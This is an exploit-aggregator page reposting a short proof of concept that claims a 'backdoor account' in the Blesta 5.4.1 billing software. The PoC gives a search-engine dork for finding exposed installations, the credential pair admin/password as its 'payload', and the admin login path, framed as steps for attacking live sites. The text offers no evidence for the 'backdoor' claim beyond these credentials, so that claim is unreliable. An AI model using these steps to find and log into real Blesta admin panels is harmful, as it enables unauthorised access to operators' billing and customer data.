Advertisement






blesta 5.4.1 Backdoor Account Vulnerability

CVE Category Price Severity
N/A CWE-284 N/A High
Author Risk Exploitation Type Date
Unknown High Remote 2022-10-13
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022100034

Below is a copy:

blesta 5.4.1 Backdoor Account Vulnerability
====================================================================================================================================
| # Title     : blesta 5.4.1 Backdoor Account Vulnerability                                                                        |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Franais V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit)                                            | 
| # Vendor    : https://account.blesta.com/client/plugin/download_manager/client_main/download/209/blesta-5.4.1.zip                |  
| # Dork      : Powered by Blesta,  Phillips Data, Inc.                                                                           |
====================================================================================================================================

poc :


[+] Dorking n Google Or Other Search Enggine.

[+] Use Payload : user=admin & pass=password 

[+] https://127.0.0.1/admin/login/

Greetings to :=========================================================================================================================
                                                                                                                                      |
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |        
                                                                                                                                      |
=======================================================================================================================================

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.